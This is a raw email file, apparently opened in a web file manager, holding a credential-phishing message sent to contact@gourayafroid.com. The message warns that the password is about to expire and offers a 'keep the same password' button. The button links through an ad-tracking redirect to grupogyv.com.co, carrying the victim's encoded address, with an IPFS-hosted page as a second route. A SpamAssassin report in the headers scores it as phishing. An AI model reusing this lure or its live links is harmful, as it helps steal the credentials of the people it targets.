OwlCyberSecurity - MANAGER
Edit File: 1744894449.M510008P393297.premium128.web-hosting.com,S=9910,W=10074:2,
Return-Path: <a_sawada@sakurai-gs.co.jp> Delivered-To: contact+spam@gourayafroid.com Received: from premium128.web-hosting.com by premium128.web-hosting.com with LMTP id k/JCFPH5AGhRAAYAAvhI2g (envelope-from <a_sawada@sakurai-gs.co.jp>) for <contact+spam@gourayafroid.com>; Thu, 17 Apr 2025 08:54:09 -0400 Return-path: <a_sawada@sakurai-gs.co.jp> Envelope-to: contact@gourayafroid.com Delivery-date: Thu, 17 Apr 2025 08:54:09 -0400 Received: from [36.139.226.177] (port=58811 helo=sakurai-gs.co.jp) by premium128.web-hosting.com with esmtp (Exim 4.98.1) (envelope-from <a_sawada@sakurai-gs.co.jp>) id 1u5Okn-00000001dbf-1dDm for contact@gourayafroid.com; Thu, 17 Apr 2025 08:54:08 -0400 From: gourayafroid.com<a_sawada@sakurai-gs.co.jp> To: contact@gourayafroid.com Date: 17 Apr 2025 20:52:47 +0800 Message-ID: <20250417205247.8FB1A6574D41A8F0@sakurai-gs.co.jp> MIME-Version: 1.0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Spam-Status: Yes, score=38.4 X-Spam-Score: 384 X-Spam-Bar: ++++++++++++++++++++++++++++++++++++++ X-Spam-Report: Spam detection software, running on the system "premium128.web-hosting.com", has identified this incoming email as possible spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: gourayafroid.com Your contact@gourayafroid.com password is about to expire (Action Required) You must take immediate steps to maintain and avoid restricting access to your gourayafroid.com account Content analysis details: (38.4 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [36.139.226.177 listed in sa-trusted.bondedsender.org] 0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [36.139.226.177 listed in sa-accredit.habeas.com] 0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [36.139.226.177 listed in bl.score.senderscore.com] 0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked. See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. [URI: doubleclick.net] [URI: grupogyv.com.co] [URI: bafybeidoz4j7wj6a45k2ewrocn75mz2k2gddgstu7yq3tagd776q5abgt4.ipfs.dweb.link] [URI: gourayafroid.com] 2.5 URIBL_DBL_PHISH Contains a Phishing URL listed in the Spamhaus DBL blocklist [URI: grupogyv.com.co] 0.1 URIBL_SBL_A Contains URL's A record listed in the Spamhaus SBL blocklist [URI: bafybeidoz4j7wj6a45k2ewrocn75mz2k2gddgstu7yq3tagd776q5abgt4.ipfs.dweb.link/209.94.90.2] [URI: bafybeidoz4j7wj6a45k2ewrocn75mz2k2gddgstu7yq3tagd776q5abgt4.ipfs.dweb.link/209.94.90.3] 1.5 SPF_HELO_SOFTFAIL SPF: HELO does not match SPF record (softfail) 1.5 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail) 0.0 KAM_DMARC_STATUS Test Rule for DKIM or SPF Failure with Strict Alignment 0.0 HTML_MESSAGE BODY: HTML included in message 0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts 2.0 RDNS_NONE Delivered to internal network by a host with no rDNS 18 KAM_IPFS Abused Protocol for Distributed Content 2.2 URI_DWEBIPFS References Interplanetary File System PtP content via dweb.link, likely phishing 0.0 URI_IPFS References Interplanetary File System PtP content, probable phishing 0.0 TO_NO_BRKTS_NORDNS_HTML To: lacks brackets and no rDNS and HTML only 5.0 KAM_SOMETLD_ARE_BAD_TLD .bar, .beauty, .buzz, .cam, .casa, .cfd, .club, .date, .guru, .link, .live, .monster, .online, .press, .pw, .quest, .rest, .sbs, .shop, .stream, .top, .trade, .wiki, .work, .xyz TLD abuse 5.5 KAM_MAILBOX2 Mailbox Quota Phishing Scams X-Spam-Flag: YES Subject: ***SPAM*** Password Notifications - Take Action Now <!DOCTYPE HTML> <html><head><title></title> <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> </head> <body style=3D"margin: 0.4em;"> <p align=3D"center" style=3D"color: rgb(36, 36, 36); text-transform: none; = text-indent: 0px; letter-spacing: normal; font-family: Roboto, sans-serif; = font-size: 15px; font-style: normal; font-weight: 400; margin-top: 0px; mar= gin-bottom: 1rem; word-spacing: 0px; white-space: normal; box-sizing: borde= r-box; orphans: 2; widows: 2; background-color: rgb(255, 255, 255); font-va= riant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-wid= th: 0px; text-decoration-thickness: initial;=20 text-decoration-style: initial; text-decoration-color: initial;"><span styl= e=3D"font-family: Arial; box-sizing: border-box;"><span style=3D"font-weigh= t: bolder; box-sizing: border-box;"><span style=3D"font-size: 23pt; box-siz= ing: border-box;"><span style=3D"color: rgb(238, 97, 17); box-sizing: borde= r-box;"><span style=3D"font-size: 25pt; box-sizing: border-box;">gourayafro= id.com</span><br style=3D"box-sizing: border-box;"></span></span><br style= =3D"box-sizing: border-box;"></span></span></p> <p align=3D"center" style=3D"color: rgb(44, 54, 58); text-transform: none; = text-indent: 0px; letter-spacing: normal; font-family: Roboto, sans-serif; = font-size: 14px; font-style: normal; font-weight: 400; margin-top: 0px; mar= gin-bottom: 1rem; word-spacing: 0px; white-space: normal; box-sizing: borde= r-box; orphans: 2; widows: 2; background-color: rgb(255, 255, 255); font-va= riant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-wid= th: 0px; text-decoration-thickness: initial;=20 text-decoration-style: initial; text-decoration-color: initial;"><span styl= e=3D"color: rgb(34, 34, 34); font-family: Arial, Helvetica, sans-serif; fon= t-size: small;">Your contact@gourayafroid.com password is about to expire (= Action Required) You must take immediate steps to maintain and avoid restri= cting access to your gourayafroid.com account</span> <br></p> <p style=3D"padding: 20px 0px; text-align: center; color: rgb(44, 54, 58); = text-transform: none; text-indent: 0px; letter-spacing: normal; font-family= : Roboto, sans-serif; font-size: 14px; font-style: normal; font-weight: 400= ; margin-top: 0px; margin-bottom: 0px; word-spacing: 0px; white-space: norm= al; box-sizing: border-box; orphans: 2; widows: 2; background-color: rgb(25= 5, 255, 255); font-variant-ligatures: normal; font-variant-caps: normal; -w= ebkit-text-stroke-width: 0px;=20 text-decoration-thickness: initial; text-decoration-style: initial; text-de= coration-color: initial;"> <a title=3D"Read Fax" style=3D"background: rgb(227, 96, 9); padding: 11px 2= 4px; color: rgb(255, 255, 255); box-sizing: border-box; text-decoration-lin= e: none;" href=3D"https://ad.doubleclick.net/ddm/trackclk/N4892.5020.477429= 1382421/B23999293.271539123;dc_trk_aid=3D466016770;dc_trk_cid=3D131101292;d= c_lat=3D;dc_rdid=3D;tag_for_child_directed_treatment=3D;tfua=3D?https://gru= pogyv.com.co/max/cgi-bin?email=3DY29udGFjdEBnb3VyYXlhZnJvaWQuY29t" target= =3D"_blank" rel=3D"noreferrer"=20 data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://bafybeidoz4j= 7wj6a45k2ewrocn75mz2k2gddgstu7yq3tagd776q5abgt4.ipfs.dweb.link/%23bonn@cybe= r.net.pk&source=3Dgmail&ust=3D1728743629899000&usg=3DAOvVaw2n-8= LLHeaZiaRR3I0VCIhI">keep the same password</a> <span style= =3D"color: rgb(227, 96, 9); box-sizing: border-box;"> </s= pan></p> <p style=3D"padding: 20px 0px; text-align: center; color: rgb(44, 54, 58); = text-transform: none; text-indent: 0px; letter-spacing: normal; font-family= : Roboto, sans-serif; font-size: 14px; font-style: normal; font-weight: 400= ; margin-top: 0px; margin-bottom: 0px; word-spacing: 0px; white-space: norm= al; box-sizing: border-box; orphans: 2; widows: 2; background-color: rgb(25= 5, 255, 255); font-variant-ligatures: normal; font-variant-caps: normal; -w= ebkit-text-stroke-width: 0px;=20 text-decoration-thickness: initial; text-decoration-style: initial; text-de= coration-color: initial;"><span style=3D"color: rgb(34, 34, 34); font-famil= y: Arial, Helvetica, sans-serif; font-size: small; box-sizing: border-box;"= >Issues discovered in the claims fulfillment system will no longer be inves= tigated or fixed.© gourayafroid.com</span><span style=3D"color: rgb(34= , 34, 34); font-family: Arial, Helvetica, sans-serif; font-size: small; box= -sizing: border-box;"> </span> <span style=3D"color: rgb(34, 34, 34); font-family: Arial, Helvetica, sans-= serif; font-size: small; box-sizing: border-box;">2024</span></p><p> </p> </body></html>